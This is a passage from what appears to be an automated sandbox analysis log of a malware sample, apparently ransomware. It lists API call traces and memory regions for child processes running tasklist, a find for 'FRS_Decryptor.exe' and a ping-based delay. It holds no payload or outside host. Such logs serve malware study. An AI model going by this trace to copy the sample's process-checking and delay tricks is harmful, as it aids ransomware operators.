CloseHandle (hObject=0x64) returned 1 [0078.531] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0078.533] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xf2f8a8 | out: lpExitCode=0xf2f8a8*=0x0) returned 1 [0078.533] CloseHandle (hObject=0x60) returned 1 [0078.533] _get_osfhandle (_FileHandle=1) returned 0x254 [0078.533] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0078.533] _get_osfhandle (_FileHandle=1) returned 0x254 [0078.533] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0078.533] _get_osfhandle (_FileHandle=0) returned 0x24 [0078.533] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0078.534] SetConsoleInputExeNameW () returned 0x1 [0078.534] GetConsoleOutputCP () returned 0x1b5 [0078.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0078.534] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.534] exit (_Code=0) Process: id = "59" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x128b6000" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "58" os_parent_pid = "0xb58" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3172 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 3173 start_va = 0x2e0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3174 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3175 start_va = 0x310000 end_va = 0x31efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 3176 start_va = 0x320000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3177 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 3178 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 3179 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3180 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3181 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3182 start_va = 0x7ed80000 end_va = 0x7eda2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed80000" filename = "" Region: id = 3183 start_va = 0x7eda8000 end_va = 0x7eda8fff entry_point = 0x0 region_type = private name = "private_0x000000007eda8000" filename = "" Region: id = 3184 start_va = 0x7edac000 end_va = 0x7edaefff entry_point = 0x0 region_type = private name = "private_0x000000007edac000" filename = "" Region: id = 3185 start_va = 0x7edaf000 end_va = 0x7edaffff entry_point = 0x0 region_type = private name = "private_0x000000007edaf000" filename = "" Region: id = 3186 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3187 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3188 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3189 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3209 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3210 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3211 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3212 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3229 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 3230 start_va = 0x2f0000 end_va = 0x2f3fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3231 start_va = 0x300000 end_va = 0x302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 3232 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 3233 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 3234 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3235 start_va = 0x400000 end_va = 0x403fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3236 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3237 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3238 start_va = 0x520000 end_va = 0x59dfff entry_point = 0x520000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3239 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3240 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3241 start_va = 0x620000 end_va = 0x7a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 3242 start_va = 0x7b0000 end_va = 0x930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 3243 start_va = 0x940000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 3244 start_va = 0x1d40000 end_va = 0x1e81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 3245 start_va = 0x1e90000 end_va = 0x2164fff entry_point = 0x1e90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3246 start_va = 0x2170000 end_va = 0x256bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002170000" filename = "" Region: id = 3247 start_va = 0x73470000 end_va = 0x734d0fff entry_point = 0x73470000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3248 start_va = 0x734e0000 end_va = 0x734ebfff entry_point = 0x734e0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3249 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3250 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3251 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3252 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3253 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3254 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3255 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3256 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3257 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3258 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3259 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3260 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3261 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3262 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3263 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3264 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3265 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3266 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3267 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3268 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3269 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3270 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3271 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3272 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3273 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3274 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3275 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3276 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3277 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3278 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3279 start_va = 0x7ec80000 end_va = 0x7ed7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec80000" filename = "" Region: id = 3280 start_va = 0x73420000 end_va = 0x73461fff entry_point = 0x73420000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3281 start_va = 0x5c0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3282 start_va = 0x2570000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 3283 start_va = 0x25b0000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 3284 start_va = 0x25f0000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 3285 start_va = 0x2630000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 3286 start_va = 0x2670000 end_va = 0x26affff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 3287 start_va = 0x73410000 end_va = 0x7341ffff entry_point = 0x73410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3288 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3289 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3290 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3291 start_va = 0x7ec7d000 end_va = 0x7ec7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec7d000" filename = "" Region: id = 3292 start_va = 0x7eda5000 end_va = 0x7eda7fff entry_point = 0x0 region_type = private name = "private_0x000000007eda5000" filename = "" Region: id = 3293 start_va = 0x7eda9000 end_va = 0x7edabfff entry_point = 0x0 region_type = private name = "private_0x000000007eda9000" filename = "" Thread: id = 191 os_tid = 0xb6c Thread: id = 193 os_tid = 0xb70 Thread: id = 194 os_tid = 0xb7c Thread: id = 195 os_tid = 0xb78 Process: id = "60" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x11ac5000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "58" os_parent_pid = "0xb58" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3191 start_va = 0xce0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 3192 start_va = 0xd00000 end_va = 0xd01fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 3193 start_va = 0xd10000 end_va = 0xd1efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 3194 start_va = 0xd20000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 3195 start_va = 0xd60000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 3196 start_va = 0xda0000 end_va = 0xda3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 3197 start_va = 0xdb0000 end_va = 0xdb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 3198 start_va = 0xdc0000 end_va = 0xdc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 3199 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 3200 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3201 start_va = 0x7ede0000 end_va = 0x7ee02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ede0000" filename = "" Region: id = 3202 start_va = 0x7ee09000 end_va = 0x7ee09fff entry_point = 0x0 region_type = private name = "private_0x000000007ee09000" filename = "" Region: id = 3203 start_va = 0x7ee0c000 end_va = 0x7ee0efff entry_point = 0x0 region_type = private name = "private_0x000000007ee0c000" filename = "" Region: id = 3204 start_va = 0x7ee0f000 end_va = 0x7ee0ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee0f000" filename = "" Region: id = 3205 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3206 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3207 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3208 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3213 start_va = 0xdf0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 3214 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3215 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3216 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3217 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 3218 start_va = 0xcf0000 end_va = 0xcf3fff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 3219 start_va = 0xd00000 end_va = 0xd03fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 3220 start_va = 0xe40000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 3221 start_va = 0xf40000 end_va = 0xfbdfff entry_point = 0xf40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3222 start_va = 0x1050000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 3223 start_va = 0x734f0000 end_va = 0x734fefff entry_point = 0x734f0000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 3224 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 3225 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3226 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3227 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3228 start_va = 0x7ece0000 end_va = 0x7eddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ece0000" filename = "" Thread: id = 192 os_tid = 0xb74 Process: id = "61" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x60c5f000" os_pid = "0xb84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3294 start_va = 0xb0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3295 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3296 start_va = 0xe0000 end_va = 0xeefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3297 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3298 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 3299 start_va = 0x170000 end_va = 0x173fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3300 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3301 start_va = 0x190000 end_va = 0x191fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3302 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 3303 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3304 start_va = 0x7fac0000 end_va = 0x7fae2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fac0000" filename = "" Region: id = 3305 start_va = 0x7fae9000 end_va = 0x7fae9fff entry_point = 0x0 region_type = private name = "private_0x000000007fae9000" filename = "" Region: id = 3306 start_va = 0x7faea000 end_va = 0x7faeafff entry_point = 0x0 region_type = private name = "private_0x000000007faea000" filename = "" Region: id = 3307 start_va = 0x7faed000 end_va = 0x7faeffff entry_point = 0x0 region_type = private name = "private_0x000000007faed000" filename = "" Region: id = 3308 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3309 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3310 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3311 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" 